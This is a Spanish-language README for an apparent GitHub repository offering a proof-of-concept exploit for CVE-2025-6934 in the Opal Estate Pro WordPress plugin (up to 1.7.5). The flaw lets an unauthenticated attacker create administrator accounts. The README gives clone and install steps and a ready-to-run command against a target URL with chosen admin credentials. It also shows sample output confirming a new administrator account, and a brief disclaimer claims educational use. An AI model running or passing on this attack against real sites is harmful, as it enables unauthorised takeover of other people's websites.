
📖 Descripción
Este repositorio contiene un exploit de Prueba de Concepto (PoC) para CVE-2025-6934,
una vulnerabilidad crítica en el Plugin de WordPress: Opal Estate Pro <= 1.7.5, que permite la creación de cuentas de administrador sin autenticación.
⚠️ Aviso legal: Esta herramienta se proporciona únicamente con fines educativos y de investigación en seguridad.
El autor no se hace responsable del uso indebido o de los daños causados.
readme.txtClona el repositorio e instala las dependencias:
git clone https://github.com/yukinime/CVE-2025-6934.git
cd CVE-2025-6934
pip3 install -r requirements.txt
requirements.txt
requests
beautifulsoup4
colorama
Ejecuta el script con tu objetivo:
python3 CVE-2025-6934.py -u http://target.com/ -mail [email protected] -password MySecurePass123 -user newadmin
✅ Ejemplo de salida:
[✔] Eksploitasi Berhasil!
Username : newadmin
Email : [email protected]
Password : MySecurePass123
Role : administrator
Captura de pantalla de la explotación
Cyberlone Indonesia (Cyberlone)
Este proyecto está licenciado bajo la Licencia MIT – consulta LICENSE para más detalles.